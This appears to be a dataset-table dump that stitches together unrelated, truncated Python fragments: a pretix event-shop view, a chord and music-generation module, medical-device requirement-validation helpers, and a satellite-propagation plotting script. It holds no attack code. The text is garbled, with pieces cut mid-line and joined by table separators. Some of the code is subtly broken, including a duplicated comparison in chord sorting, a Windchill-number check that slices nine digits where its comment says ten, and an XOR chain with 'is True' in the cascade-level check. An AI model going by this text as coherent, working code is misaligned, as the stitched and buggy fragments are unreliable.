input
stringlengths 2.65k
237k
| output
stringclasses 1
value |
---|---|
allow_addons and not base_qs_set and not filter_items and not filter_categories:
event.cache.set(quota_cache_key, quota_cache, 5)
items = [item for item in items
if (len(item.available_variations) > 0 or not item.has_variations) and not item._remove]
return items, display_add_to_cart
@method_decorator(allow_frame_if_namespaced, 'dispatch')
@method_decorator(iframe_entry_view_wrapper, 'dispatch')
class EventIndex(EventViewMixin, EventListMixin, CartMixin, TemplateView):
template_name = "pretixpresale/event/index.html"
def get(self, request, *args, **kwargs):
# redirect old month-year-URLs to new date-URLs
keys = ("month", "year")
if all(k in request.GET for k in keys):
get_params = {k: v for k, v in request.GET.items() if k not in keys}
get_params["date"] = "%s-%s" % (request.GET.get("year"), request.GET.get("month"))
return redirect(self.request.path + "?" + urlencode(get_params))
# redirect old week-year-URLs to new date-URLs
keys = ("week", "year")
if all(k in request.GET for k in keys):
get_params = {k: v for k, v in request.GET.items() if k not in keys}
get_params["date"] = "%s-W%s" % (request.GET.get("year"), request.GET.get("week"))
return redirect(self.request.path + "?" + urlencode(get_params))
from pretix.presale.views.cart import get_or_create_cart_id
self.subevent = None
if request.GET.get('src', '') == 'widget' and 'take_cart_id' in request.GET:
# User has clicked "Open in a new tab" link in widget
get_or_create_cart_id(request)
return redirect(eventreverse(request.event, 'presale:event.index', kwargs=kwargs))
elif request.GET.get('iframe', '') == '1' and 'take_cart_id' in request.GET:
# Widget just opened, a cart already exists. Let's to a stupid redirect to check if cookies are disabled
get_or_create_cart_id(request)
return redirect(eventreverse(request.event, 'presale:event.index', kwargs=kwargs) + '?require_cookie=true&cart_id={}'.format(
request.GET.get('take_cart_id')
))
elif request.GET.get('iframe', '') == '1' and len(self.request.GET.get('widget_data', '{}')) > 3:
# We've been passed data from a widget, we need to create a cart session to store it.
get_or_create_cart_id(request)
elif 'require_cookie' in request.GET and settings.SESSION_COOKIE_NAME not in request.COOKIES:
# Cookies are in fact not supported
r = render(request, 'pretixpresale/event/cookies.html', {
'url': eventreverse(
request.event, "presale:event.index", kwargs={'cart_namespace': kwargs.get('cart_namespace') or ''}
) + (
"?src=widget&take_cart_id={}".format(request.GET.get('cart_id'))
if "cart_id" in request.GET else ""
)
})
r._csp_ignore = True
return r
if request.sales_channel.identifier not in request.event.sales_channels:
raise Http404(_('Tickets for this event cannot be purchased on this sales channel.'))
if request.event.has_subevents:
if 'subevent' in kwargs:
self.subevent = request.event.subevents.using(settings.DATABASE_REPLICA).filter(pk=kwargs['subevent'], active=True).first()
if not self.subevent:
raise Http404()
return super().get(request, *args, **kwargs)
else:
return super().get(request, *args, **kwargs)
else:
if 'subevent' in kwargs:
return redirect(self.get_index_url())
else:
return super().get(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# Show voucher option if an event is selected and vouchers exist
vouchers_exist = self.request.event.cache.get('vouchers_exist')
if vouchers_exist is None:
vouchers_exist = self.request.event.vouchers.exists()
self.request.event.cache.set('vouchers_exist', vouchers_exist)
context['show_vouchers'] = context['vouchers_exist'] = vouchers_exist
context['ev'] = self.subevent or self.request.event
context['subevent'] = self.subevent
context['allow_waitinglist'] = self.request.event.settings.waiting_list_enabled and context['ev'].presale_is_running
if not self.request.event.has_subevents or self.subevent:
# Fetch all items
items, display_add_to_cart = get_grouped_items(
self.request.event, self.subevent,
filter_items=self.request.GET.getlist('item'),
filter_categories=self.request.GET.getlist('category'),
require_seat=None,
channel=self.request.sales_channel.identifier,
memberships=(
self.request.customer.usable_memberships(
for_event=self.subevent or self.request.event,
testmode=self.request.event.testmode
) if getattr(self.request, 'customer', None) else None
),
)
context['waitinglist_seated'] = False
if context['allow_waitinglist']:
for i in items:
if not i.allow_waitinglist or not i.requires_seat:
continue
if i.has_variations:
for v in i.available_variations:
if v.cached_availability[0] != Quota.AVAILABILITY_OK:
context['waitinglist_seated'] = True
break
else:
if i.cached_availability[0] != Quota.AVAILABILITY_OK:
context['waitinglist_seated'] = True
break
items = [i for i in items if not i.requires_seat]
context['itemnum'] = len(items)
context['allfree'] = all(
item.display_price.gross == Decimal('0.00') for item in items if not item.has_variations
) and all(
all(
var.display_price.gross == Decimal('0.00')
for var in item.available_variations
)
for item in items if item.has_variations
)
# Regroup those by category
context['items_by_category'] = item_group_by_category(items)
context['display_add_to_cart'] = display_add_to_cart
context['cart'] = self.get_cart()
context['has_addon_choices'] = any(cp.has_addon_choices for cp in get_cart(self.request))
if self.subevent:
context['frontpage_text'] = str(self.subevent.frontpage_text)
else:
context['frontpage_text'] = str(self.request.event.settings.frontpage_text)
if self.request.event.has_subevents:
context['subevent_list'] = SimpleLazyObject(self._subevent_list_context)
context['subevent_list_cache_key'] = self._subevent_list_cachekey()
context['show_cart'] = (
context['cart']['positions'] and (
self.request.event.has_subevents or self.request.event.presale_is_running
)
)
if self.request.event.settings.redirect_to_checkout_directly:
context['cart_redirect'] = eventreverse(self.request.event, 'presale:event.checkout.start',
kwargs={'cart_namespace': kwargs.get('cart_namespace') or ''})
if context['cart_redirect'].startswith('https:'):
context['cart_redirect'] = '/' + context['cart_redirect'].split('/', 3)[3]
else:
context['cart_redirect'] = self.request.path
return context
def _subevent_list_cachekey(self):
cache_key_parts = [
self.request.host,
str(self.request.event.pk),
self.request.get_full_path(),
self.request.LANGUAGE_CODE,
self.request.sales_channel.identifier,
]
cache_key = f'pretix.presale.views.event.EventIndex.subevent_list_context:{hashlib.md5(":".join(cache_key_parts).encode()).hexdigest()}'
return cache_key
def _subevent_list_context(self):
voucher = None
if self.request.GET.get('voucher'):
try:
voucher = Voucher.objects.get(code__iexact=self.request.GET.get('voucher'), event=self.request.event)
except Voucher.DoesNotExist:
pass
context = {}
context['list_type'] = self.request.GET.get("style", self.request.event.settings.event_list_type)
if context['list_type'] not in ("calendar", "week") and self.request.event.subevents.filter(date_from__gt=now()).count() > 50:
if self.request.event.settings.event_list_type not in ("calendar", "week"):
self.request.event.settings.event_list_type = "calendar"
context['list_type'] = "calendar"
if context['list_type'] == "calendar":
self._set_month_year()
tz = pytz.timezone(self.request.event.settings.timezone)
_, ndays = calendar.monthrange(self.year, self.month)
before = datetime(self.year, self.month, 1, 0, 0, 0, tzinfo=tz) - timedelta(days=1)
after = datetime(self.year, self.month, ndays, 0, 0, 0, tzinfo=tz) + timedelta(days=1)
context['date'] = date(self.year, self.month, 1)
context['before'] = before
context['after'] = after
ebd = defaultdict(list)
add_subevents_for_days(
filter_qs_by_attr(self.request.event.subevents_annotated(self.request.sales_channel.identifier).using(settings.DATABASE_REPLICA), self.request),
before, after, ebd, set(), self.request.event,
self.kwargs.get('cart_namespace'),
voucher,
)
# Hide names of subevents in event series where it is always the same. No need to show the name of the museum thousands of times
# in the calendar. We previously only looked at the current time range for this condition which caused weird side-effects, so we need
# an extra query to look at the entire series. For performance reasons, we have a limit on how many different names we look at.
context['show_names'] = sum(len(i) for i in ebd.values() if isinstance(i, list)) < 2 or self.request.event.cache.get_or_set(
'has_different_subevent_names',
lambda: len(set(str(n) for n in self.request.event.subevents.values_list('name', flat=True).annotate(c=Count('*'))[:250])) != 1,
timeout=120,
)
context['weeks'] = weeks_for_template(ebd, self.year, self.month)
context['months'] = [date(self.year, i + 1, 1) for i in range(12)]
context['years'] = range(now().year - 2, now().year + 3)
elif context['list_type'] == "week":
self._set_week_year()
tz = pytz.timezone(self.request.event.settings.timezone)
week = isoweek.Week(self.year, self.week)
before = datetime(
week.monday().year, week.monday().month, week.monday().day, 0, 0, 0, tzinfo=tz
) - timedelta(days=1)
after = datetime(
week.sunday().year, week.sunday().month, week.sunday().day, 0, 0, 0, tzinfo=tz
) + timedelta(days=1)
context['date'] = week.monday()
context['before'] = before
context['after'] = after
ebd = defaultdict(list)
add_subevents_for_days(
filter_qs_by_attr(self.request.event.subevents_annotated(self.request.sales_channel.identifier).using(settings.DATABASE_REPLICA), self.request),
before, after, ebd, set(), self.request.event,
self.kwargs.get('cart_namespace'),
voucher,
)
# Hide names of subevents in event series where it is always the same. No need to show the name of the museum thousands of times
# in the calendar. We previously only looked at the current time range for this condition which caused weird side-effects, so we need
# an extra query to look at the entire series. For performance reasons, we have a limit on how many different names we look at.
context['show_names'] = sum(len(i) for i in ebd.values() if isinstance(i, list)) < 2 or self.request.event.cache.get_or_set(
'has_different_subevent_names',
lambda: len(set(str(n) for n in self.request.event.subevents.values_list('name', flat=True).annotate(c=Count('*'))[:250])) != 1,
timeout=120,
)
context['days'] = days_for_template(ebd, week)
years = (self.year - 1, self.year, self.year + 1)
weeks = []
for year in years:
weeks += [
(date_fromisocalendar(year, i + 1, 1), date_fromisocalendar(year, i + 1, 7))
for i in range(53 if date(year, 12, 31).isocalendar()[1] == 53 else 52)
]
context['weeks'] = [[w for w in weeks if w[0].year == year] for year in years]
context['week_format'] = get_format('WEEK_FORMAT')
if context['week_format'] == 'WEEK_FORMAT':
context['week_format'] = WEEK_FORMAT
context['short_month_day_format'] = get_format('SHORT_MONTH_DAY_FORMAT')
if context['short_month_day_format'] == 'SHORT_MONTH_DAY_FORMAT':
context['short_month_day_format'] = SHORT_MONTH_DAY_FORMAT
else:
context['subevent_list'] = self.request.event.subevents_sorted(
filter_qs_by_attr(self.request.event.subevents_annotated(self.request.sales_channel.identifier).using(settings.DATABASE_REPLICA), self.request)
)
if self.request.event.settings.event_list_available_only and not voucher:
context['subevent_list'] = [
se for se in context['subevent_list']
if not se.presale_has_ended and (se.best_availability_state is None or se.best_availability_state >= Quota.AVAILABILITY_RESERVED)
]
return context
@method_decorator(allow_frame_if_namespaced, 'dispatch')
@method_decorator(iframe_entry_view_wrapper, 'dispatch')
class SeatingPlanView(EventViewMixin, TemplateView):
template_name = "pretixpresale/event/seatingplan.html"
def get(self, request, *args, **kwargs):
from pretix.presale.views.cart import get_or_create_cart_id
self.subevent = None
if request.GET.get('src', '') == 'widget' and 'take_cart_id' in request.GET:
# User has clicked "Open in a new tab" link in widget
get_or_create_cart_id(request)
return redirect(eventreverse(request.event, 'presale:event.seatingplan', kwargs=kwargs))
elif request.GET.get('iframe', '') == '1' and 'take_cart_id' in request.GET:
# Widget just opened, a cart already exists. Let's to a stupid redirect to check if cookies are disabled
get_or_create_cart_id(request)
return redirect(eventreverse(request.event, 'presale:event.seatingplan', kwargs=kwargs) + '?require_cookie=true&cart_id={}'.format(
request.GET.get('take_cart_id')
))
elif request.GET.get('iframe', '') == '1' and len(self.request.GET.get('widget_data', '{}')) > 3:
# We've been passed data from a widget, we need to create a cart session to store it.
get_or_create_cart_id(request)
if request.event.has_subevents:
if 'subevent' in kwargs:
self.subevent = request.event.subevents.using(settings.DATABASE_REPLICA).filter(pk=kwargs['subevent'], active=True).first()
if not self.subevent or not self.subevent.seating_plan:
raise Http404()
return super().get(request, *args, **kwargs)
else:
raise Http404()
else:
if 'subevent' in kwargs or not request.event.seating_plan:
raise Http404()
else:
return super().get(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['subevent'] = self.subevent
context['cart_redirect'] = eventreverse(self.request.event, 'presale:event.checkout.start',
kwargs={'cart_namespace': kwargs.get('cart_namespace') or ''})
if context['cart_redirect'].startswith('https:'):
context['cart_redirect'] = '/' + context['cart_redirect'].split('/', 3)[3]
return context
class EventIcalDownload(EventViewMixin, View):
def get(self, request, *args, **kwargs):
if | |
None:
arg2chords = ()
for i in arg1chords:
if (i._size==arg2) or (i._happ==arg2):
arg2chords = arg2chords + (i,)
return arg2chords
def makeProg(self, progsize, arg1dist, arg2dist): # Return chord progression of size with selected distributions
def aux(scale, a1d, a2d):
arg1 = wselect(a1d)
arg2 = wselect(a2d)
chords = scale.getChords(arg1, arg2)
if len(chords) == 0:
return aux(scale, a1d, a2d)
return rselect(chords)
prog = ()
for i in range(progsize):
ch = aux(self,arg1dist, arg2dist)
print(ch)
if ch in prog:
print(ch, "retrying")
ch = aux(self,arg1dist, arg2dist) #if chord is already in prog, it is rerolled to lower odds of repeated chords
print("retried and got", ch)
prog = prog + (ch,)
return prog
def sample(self, inst = filezart.getInstrument("Piano_original")):
total = (500 * 7) + 3000
notes = listNotes(inst)
mednote = notes[len(notes)//2]
medoct = mednote._octave
audio = AudioSegment.silent(total)
t = 0
for note in self._notes:
newn = mnote(note._type + (medoct*12))
noteaudio = newn.getAudio(inst, 60)
audio = audio.overlay(noteaudio, t)
t= t+500
return audio
# chord3 Classic 3 note Chord Class
# must be initiated with three notes or fromRandom()
class chord3:
def __init__(self, note1, note2, note3):
lista = (mnote(note1._type), mnote(note2._type), mnote(note3._type))
self._types = self.chordSort(lista)
self._size = "" # "short", "normal", "large"
self._happ = "" # "minor", "weird", "major"
self.classify()
def __repr__(self):
string = "<."
for i in self._types:
string = string + i._typename + "."
return string + ">"
def __eq__(self, other):
if(isinstance(other, chord3)):
return (self._types[0]._value == other._types[0]._value)
return False
def __hash__(self):
return self._types[0]._value * self._types[1]._value * self._types[2]._value
@classmethod
def fromRandom(cls): # can create as chord3.fromRandom()
notes = firstOctave()
note1 = rselect(notes)
notes = removeEls(notes, note1, lambda x,y: x.isDissonant(y))
notes = removeEls(notes, note1, lambda x,y: x.isSame(y))
note2 = rselect(notes)
notes = removeEls(notes, note2, lambda x,y: x.isDissonant(y))
notes = removeEls(notes, note2, lambda x,y: x.isSame(y))
note3 = rselect(notes)
return cls(note1, note2, note3)
@classmethod
def fromScale(cls, scale):
return rselect(scale.getChords())
def chordSort(self, notes): # puts notes in order of chord
a = notes[0]
b = notes[1]
c = notes[2]
distAB = a.distance(b)
distBC = b.distance(c)
distAC = a.distance(c)
if (distAB>=distBC) and (distAB>=distAC):
far1 = a
far2 = b
mid = c
elif (distBC>=distAC) and (distBC>=distAC):
far1 = b
far2 = c
mid = a
else:
far1 = a
far2 = c
mid = b
if far1.premier(mid):
first = far1
second = mid
third = far2
else:
first = far2
second = mid
third = far1
return (first, second, third)
def classify(self): # calculates _size and _happ attributes
a = self._types[0]
b = self._types[1]
c = self._types[2]
leap1 = a.distance(b)
leap2 = b.distance(c)
size = leap1 + leap2
if size > 7:
self._size = "large"
elif size < 7:
self._size = "short"
else:
self._size = "normal"
if leap1 > leap2:
self._happ = "major"
elif leap1 < leap2:
self._happ = "minor"
else:
self._happ = "weird"
return
def sampleAudio(self, inst = filezart.getInstrument("Piano_original")):
notes = listNotes(inst)
mednote = notes[len(notes)//2]
medoct = mednote._octave
notes = (mnote(self._types[0]._type + 12*medoct),mnote(self._types[1]._type + 12*medoct),mnote(self._types[2]._type + 12*medoct))
audio = AudioSegment.silent(3000)
for note in notes:
noteaudio = note.getAudio(inst, 60)
audio = audio.overlay(noteaudio, position=0)
return audio
# Small section of sheet music class
# Initialized with number of beats and chord3(optional)
class chunk:
def __init__(self, size, chord=None):
self._size = size
self._chord = chord
self._content = [()]*(4*size) # Notes can be placed on half and quarter beats
def __repr__(self):
st = "|"
c = 4
for i in self._content:
if (c==4):
c=0
st = st + "|"
c = c+1
st = st + "."
for j in i:
st = st + str(j) + "."
st = st + "|"
return st
def indexof(self, tempo): # List index corresponding to tempo ex: 0.75 -> 3
return int(tempo*4)
def set(self, tempo, tupl):
i = self.indexof(tempo)
self._content[i] = tupl
def get(self, tempo):
i = self.indexof(tempo)
return self._content[i]
def add(self, tempo, note):
i = self.indexof(tempo)
self._content[i] = self._content[i] + (note,)
def wholes(self): # List of whole tempos in chunk
lista = ()
for i in range(self._size):
lista = lista + (i,)
return lista
def halves(self): # List of half tempos in chunk
lista = ()
for i in range(self._size):
lista = lista + (i+0.5,)
return lista
def quarters(self): # List of quarter tempos in chunk
lista = ()
for i in range(self._size):
lista = lista + (i+0.25, i+0.75)
return lista
def randMovs(self, count, tweights, mweights): # Places count mmov objects with mweights and tweights distribution on chunk
for i in range(count):
mov = wselect(mweights)
ttype = wselect(tweights) # tweights should be dict of ("whole", "half", "quarter") (note that there are twice as many quarters)
if ttype == "whole":
tempo = rselect(self.wholes())
elif ttype == "half":
tempo = rselect(self.halves())
elif ttype == "quarter":
tempo = rselect(self.quarters())
else:
raise ValueError ("Invalid ttype: " + ttype + ".")
self.add(tempo, mov)
return
def applyToMovs(self, voic): # Replaces mmovs with mnotes according to voice
last = None
for temp in range(len(self._content)):
newtemp = ()
lastcandidate = None
for mov in self._content[temp]:
if(isinstance(mov, mmov)):
sel = mov.select(last,voic._weights, self._chord)
newtemp = newtemp + (sel,)
lastcandidate = sel
elif(isinstance(mov, mnote)):
newtemp = newtemp + (mov,) #mov is actually a note here
lastcandidate = mov
if lastcandidate != None:
last = lastcandidate
self._content[temp] = newtemp
return
def baseDuration(self, bpm): # Duration of chunk without extra time for last note to play
beat = bpmToBeat(bpm)
base = beat*self._size
return base
def getAudio(self, inst, bpm): # returns AudioSegment
beat = bpmToBeat(bpm)
base = beat*self._size
total = base + 3000 #extra time for last note to play
sound = AudioSegment.silent(total)
for temp in range(len(self._content)):
thissound = AudioSegment.silent(3000)
for note in self._content[temp]:
noteaudio = note.getAudio(inst, bpm)
thissound = thissound.overlay(noteaudio, position=0)
sound = sound.overlay(thissound, position=(beat/4)*temp)
return sound
def clearAudio(self): # recursive clean of audio cache
return
def toTab(self): # return Tab string
return str(self)
# Chord progression class, list of size chunks
# Initialized with size of chunks
class progression:
def __init__(self, csize):
self._csize = csize
self._chunks = ()
self._audio = None
self._abpm = 0
self._ainst = None
def baseDuration(self, bpm): # Duration of chunk without extra time for last note to play
beat = bpmToBeat(bpm)
base = beat*self._csize*len(self._chunks)
return base
def getAudio(self, inst, bpm): # check if audio is cached
if (self._audio == None) or (self._abpm != bpm):
print("caching")
return self.forceGetAudio(inst, bpm)
print("cached")
return self._audio
def clearAudio(self): # recursive clean of audio cache
self._audio = None
for c in self._chunks:
c.clearAudio()
def forceGetAudio(self, inst, bpm): # returns AudioSegment
beat = bpmToBeat(bpm)
base = beat*self._csize*len(self._chunks)
total = base + 3000 #extra time for last note to play
sample = self._chunks[0]
chunkdur = sample.baseDuration(bpm)
sound = AudioSegment.silent(total)
for ctime in range(len(self._chunks)):
caudio = self._chunks[ctime].getAudio(inst, bpm)
sound = sound.overlay(caudio, position=ctime*chunkdur)
self._audio = sound
self._abpm = bpm
return sound
def toTab(self): # return Tab string
stri = ""
for ch in self._chunks:
stri = stri + "\n" + ch.toTab()
return stri
# Voice Class, identifies instrument, octave zone, stereo and volume information
# Has list of progressions
# Initialized with instrument, centre, mtype(optional), volume(optional), pan(optional)
class voice:
def __init__(self, instrument, centre, scale, mtype = "chordic", vol = 0, pan = 0): #vol in db added to output, pan in [-1, 1]
self._inst = instrument
self._cent = centre
self._vol = vol
self._pan = pan
self._mtype = mtype # mtype: "generic" "chordic" "smelodic" "lmelodic" "percussion"
self._scale = scale
self._weights = {}
self._progs = ()
self._audio = None
self._abpm = 0
notes = listNotes(instrument)
notes = removeEls(notes, scale, lambda x,y : ( not(x.inScale(y))))
for note in notes:
self._weights[note] = adaptedNormal(centre._value, note._value)
def __repr__(self):
return "~" + self.getTag() + ":" + self._inst._name + "->" + str(self._cent) + "<-" + str(self._scale)[2:-2] + "~"
def getTag(self):
try:
return | |
level
# check if cascade level is one of the approved options.
# returns true if it is procedure step, user need, risk need, business need, design input or design output
# FDR rules: cascade level may only be one of the 6 defined types.
def is_cascade_lvl_approved(value):
if is_procedure_step(value) \
^ is_user_need(value) \
^ is_risk_need(value) \
^ is_business_need(value) \
^ is_design_input(value) \
^ is_design_output(value) is True:
return True
else:
return False
# V&V Results
# check if W/C,wc or windchill is present. should indicate if windchill number is present
# FDR rules: Design inputs and outputs may reference a document in windchill for its verification/validation results
def has_w_slash_c(value):
# convert input argument to all lower case for comparison
val_lower = value.lower()
if val_lower.find("w/c") != -1:
return True
elif val_lower.find("wc") != -1:
return True
elif val_lower.find("windchill") != -1:
return True
else:
return False
# V&V
# check if 10 digit windchill number is present. example W/C# 0000006634
def is_windchill_number_present(value):
# remove all spaces
value = value.replace(" ", "")
# find _get_index of 000. windchill numbers have at least three leading zeros.
leading_zeros_index = value.find("000")
# slice the string starting at that _get_index until the end of the string
value = value[leading_zeros_index:]
# slice string again into two parts. first 10 characters (possible WC number) and remaining characters
wc_number = value[:9]
remaining_char = value[10:]
# test if wc_number is all digits and remaining is all letters
if wc_number.isdigit() and (remaining_char.isalpha() or len(remaining_char) == 0) is True:
return True
else:
return False
# Design Output Feature
# check for CTQ IDs. returns true if "CTQ" is present in the cell
# FDR rules: CTQ (critical to quality) features should be called out in the Design Output features column.
# CTQs should be called out using the following format: (CTQ08)
def has_ctq_id(value):
if value.lower().find("ctq") != -1:
return True
else:
return False
# Design Output Features
# check for CTQ number after CTQ tag. returns true if all occurrences of CTQ are followed by two digits
# returns false if no CTQs are present OR they are not followed by two digits. (this should be used in conjunction
# with the previous function that looks for CTQ in the cell to eliminate possibility of the former case)
# FDR rules: CTQ (critical to quality) features should be called out in the Design Output features column.
# CTQs should be called out using the following format: (CTQ08)
def has_ctq_numbers(value):
ctq_count = 0
number_count = 0
# find _get_index of first CTQ ID
ctq_index = value.lower().find("ctq")
# while loop will keep searching for CTQ IDs until there are none. the string is sliced, checked for digits,
# searched for a new ID, _get_index found for new CTQ ID, repeat.
while ctq_index != -1:
# add 1 to ctq_counter, if there were no CTQs, the while condition would not be met.
ctq_count += 1
# slice value from after "ctq"
value = value[ctq_index + 3:]
# if the next two characters are numbers (they should be if formatted correctly)
if value[0:2].isdigit() is True:
# add 1 to number counter. this counter will be compared to ctq_count later. they should match
number_count += 1
# search for next CTQ. if there are not, find() will output a -1 and while loop will end
ctq_index = value.lower().find("ctq")
# if "ctq" and number count match AND they aren't zero...they are formatted correctly.
if (ctq_count == number_count) and ctq_count > 0:
return True
else:
return False
# Requirement Statement
# checks for hash (#) symbol in string
# FDR rules: hastags are used to identify parent/child relationships,
# functional requirements, mating part requirements, user interface requirements and mechanical properties
def has_hash(value):
if value.find("#") != -1:
return True
else:
return False
# Requirement Statement
# checks for #Function in cell.
# FDR rules: The requirement statement can be tagged using #Function to identify a functional requirement
def has_hash_function(value):
if value.find("#Function") != -1:
return True
else:
return False
# Requirement Statement
# checks for #MatingParts
# FDR rules: The requirement statement can be tagged using #MatingParts to identify a requirement pertaining to proper
# fitting between components
def has_hash_mating_parts(value):
if value.find("#MatingParts") != -1:
return True
else:
return False
# Requirement Statement
# checks for #MechProperties
# FDr rules: The requirement statement can be tagged using #MechProperties to identify a requirement that pertains to
# the mechanical properties of the implant/instrument
def has_hash_mech_properties(value):
if value.find("#MechProperties") != -1:
return True
else:
return False
# Requirement Statement
# checks for #UserInterface
# FDR rules: the requirement statement can be tagged using #UserInterface to identify a requirement that relates to how
# the user handles the implant/instrument
def has_hash_user_interface(value):
if value.find("#UserInterface") != -1:
return True
else:
return False
# TODO will #Parent or #AdditionalParent be used in requirement statement? sticking with #Parent for now
# Requirement Statement
# checks for #Child returns true if #Child is present
# FDR rules: #Child and #Parent are used to link a Design Input that leads to a Design Output Solution that has
# been documented earlier in the form. The Design Input is tagged using #Child = P###-### where the ID refers to the
# Output solution and the Output solution is tagged using #Parent = P###-### where the ID refers to the Design Input
def has_hash_child(value):
if value.find("#Child") != -1:
return True
else:
return False
# Requirement Statement
# checks for #Parent returns true if #Parent is present
# FDR rules: #Child and #Parent are used to link a Design Input that leads to a Design Output Solution that has
# been documented earlier in the form. The Design Input is tagged using #Child = P###-### where the ID refers to the
# Output solution and the Output solution is tagged using #Parent = P###-### where the ID refers to the Design Input
# TODO let's not use the word "hash" here. It has a very specific meaning in computer science which can cause
# confusion. In fact, you've probably already heard/seen it mentioned in the git literature. It's synonymous with
# "checksum". It's how Python dictionaries work too.
def has_hash_parent(value):
if value.find("#Parent") != -1:
return True
else:
return False
# Requirement Statement
# returns IDs (P###-###) that are tagged using #Child as a list. assumes there are #Child present.
# FDR rules: #Child and #Parent are used to link a Design Input that leads to a Design Output Solution that has
# been documented earlier in the form. The Design Input is tagged using #Child = P###-### where the ID refers to the
# Output solution and the Output solution is tagged using #Parent = P###-### where the ID refers to the Design Input
def child_ids(value):
# init output list. will append with values later
ids_output_list = []
# remove spaces for easier evaluation
value = value.replace(" ", "")
# while there are #child in string. string will be sliced after each ID is retrieved
while value.find("#Child") != -1:
# find the _get_index of the child hashtag
hash_index = value.find("#Child")
value = value[hash_index:]
# find the beginning of the ID by searching for P
id_start_index = value.find("P")
# append output list with ID
ids_output_list.append(value[id_start_index:id_start_index + 7])
value = value[id_start_index:]
return ids_output_list
# Requirement Statement
# returns IDs (P###-###) that are tagged using #Parent as a list. assumes there are #Parent present.
# FDR rules: #Child and #Parent are used to link a Design Input that leads to a Design Output Solution that has
# been documented earlier in the form. The Design Input is tagged using #Child = P###-### where the ID refers to the
# Output solution and the Output solution is tagged using #Parent = P###-### where the ID refers to the Design Input
def parent_ids(value):
# init output list. will append with values later
ids_output_list = []
# remove spaces for easier evaluation
value = value.replace(" ", "")
# while there are #child in string. string will be sliced after each ID is retrieved
while value.find("#Parent") != -1:
# find the _get_index of the child hashtag
hash_index = value.find("#Parent")
# slice value from the hash_index + 2 (to account for capital P at the beginning of Parent) to the end
value | |
#!/bin/env python
# Plot differences between sets of TEME vectors
import matplotlib.pyplot as plt
import matplotlib.patheffects as pe
import re
import os, sys
import subprocess
import datetime
import csv
from math import degrees, isnan
# Configuration ###############################################################
dry_run = False
elev_only = False
if (len(sys.argv) > 1):
if (sys.argv[1] == 'd'):
dry_run = True
elif (sys.argv[1] == 'e'):
elev_only = True
aiaa_binary = 'aiaa'
ansi_binary = 'ansi'
if os.name == 'nt':
print("Assuming Windows environment")
aiaa_binary += '.exe'
ansi_binary += '.exe'
if os.name == 'posix':
print("Assuming Linux (posix) environment")
ver_filename = 'SGP4-VER.TLE'
fullcat_filename = 'full.tle'
aiaa_out_filename = 'i72.out'
ansi_out_filename = 'ansi.out'
sat_re = re.compile(r'([0-9]{1,5})\ \(([0-9. e+]+)\)')
tdiff_it = datetime.timedelta()
tdiff_ansit = datetime.timedelta()
tdiff_ic = datetime.timedelta()
tdiff_ansic = datetime.timedelta()
# Test runs ###################################################################
def elev():
print('Running libsgp4ansi in elevations generation mode...')
print(subprocess.Popen([os.path.join(os.getcwd(), ansi_binary), 'p'],
stdout=subprocess.PIPE).communicate()[0].decode())
el_x = []
el_y = []
# el_a = []
with open('elevations.out') as f:
elevations_data = f.readlines()
for line in elevations_data:
el_x.append(int(line.split(',')[0]))
el_y.append(float(line.split(',')[1]))
# el_a.append(float(line.split(',')[2]))
fig, ax = plt.subplots(1, 1)
fig.canvas.set_window_title('Elevation')
xmin = 0
xmax = el_x[len(el_x) - 1]
xticksmin = range(xmin, xmax + 1, 1440 * 60)
xticksmaj = range(xmin, xmax + 1, 360 * 60)
yticksmin = [-75, -60, -45, -30, -15, 15, 30, 45, 60, 75]
yticksmaj = [0]
ax.plot(el_x, el_y, c='b', marker='', ls='-', lw=0.5)
# ax.plot(el_x, el_a, c='r', marker='', ls='-', lw=0.5)
ax.set_xlim(xmin, xmax)
ax.set_ylim(-90, 90)
ax.set_xticks(xticksmin, True);
ax.set_xticks(xticksmaj, False);
ax.grid(which='major', axis='x', ls='dashed', alpha=0.7)
ax.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
ax.set_yticks(yticksmin, True);
ax.set_yticks(yticksmaj, False);
ax.grid(which='major', axis='y', ls='-', alpha=1)
ax.grid(which='minor', axis='y', ls='dotted', alpha=0.5)
ax.set_title('Elevation of test satellite-observer pair')
ax.set_xlabel('Time, min')
ax.set_ylabel('Elevation, deg')
fig.set_tight_layout({'pad':0.0, 'w_pad':0.1, 'h_pad':0.1})
plt.show()
exit(0)
def verif():
print('Running AIAA-2006-6753 verification mode...')
print(subprocess.Popen([os.path.join(os.getcwd(), aiaa_binary), 'i', 'v', ver_filename],
stdout=subprocess.PIPE).communicate()[0].decode())
print('Running libsgp4ansi verification mode...')
print(subprocess.Popen([os.path.join(os.getcwd(), ansi_binary), 'v', ver_filename],
stdout=subprocess.PIPE).communicate()[0].decode())
print('Loading verification data...')
with open('i72_ver.out') as f:
aiaa_ver_file = f.readlines()
with open('ansi_ver.out') as f:
ansi_ver_file = f.readlines()
aiaa_ver_sats = {}
ansi_ver_sats = {}
for i, line in enumerate(aiaa_ver_file):
m = sat_re.findall(line.strip())
if m != []:
current_sat = m[0][0]
aiaa_ver_sats[current_sat] = [float(m[0][1]), 0.0, {}]
else:
try:
vals = list(map(float, line.split()))
except ValueError as e:
print('\n[{0}] {1}'.format(i, str(e)))
aiaa_ver_sats[current_sat][2][vals[0]] = vals[1:]
if ((i % 1000 == 0) | (i == len(aiaa_ver_file) - 1)):
progress = int(i / (len(aiaa_ver_file) - 1) * 20)
print('AIAA: [{0}] {1:7}/{2:7} lines, {3:5} satellites\r'.format(
'=' * progress + ' ' * (20 - progress), i, len(aiaa_ver_file) - 1,
len(aiaa_ver_sats.keys())), end='')
print('')
for i, line in enumerate(ansi_ver_file):
m = sat_re.findall(line.strip())
if m != []:
current_sat = m[0][0]
ansi_ver_sats[current_sat] = [float(m[0][1]), 0.0, {}]
else:
try:
vals = list(map(float, line.split()))
except ValueError as e:
print('\n[{0}] {1}'.format(i, str(e)))
ansi_ver_sats[current_sat][2][vals[0]] = vals[1:]
if ((i % 1000 == 0) | (i == len(ansi_ver_file) - 1)):
progress = int(i / (len(ansi_ver_file) - 1) * 20)
print('ANSI: [{0}] {1:7}/{2:7} lines, {3:5} satellites\r'.format(
'=' * progress + ' ' * (20 - progress), i, len(ansi_ver_file) - 1,
len(ansi_ver_sats.keys())), end='')
print('')
verif_points = {}
verif_annot = []
for sat in list(aiaa_ver_sats.keys()):
maxdelta = 0
for time in aiaa_ver_sats[sat][2].keys():
try:
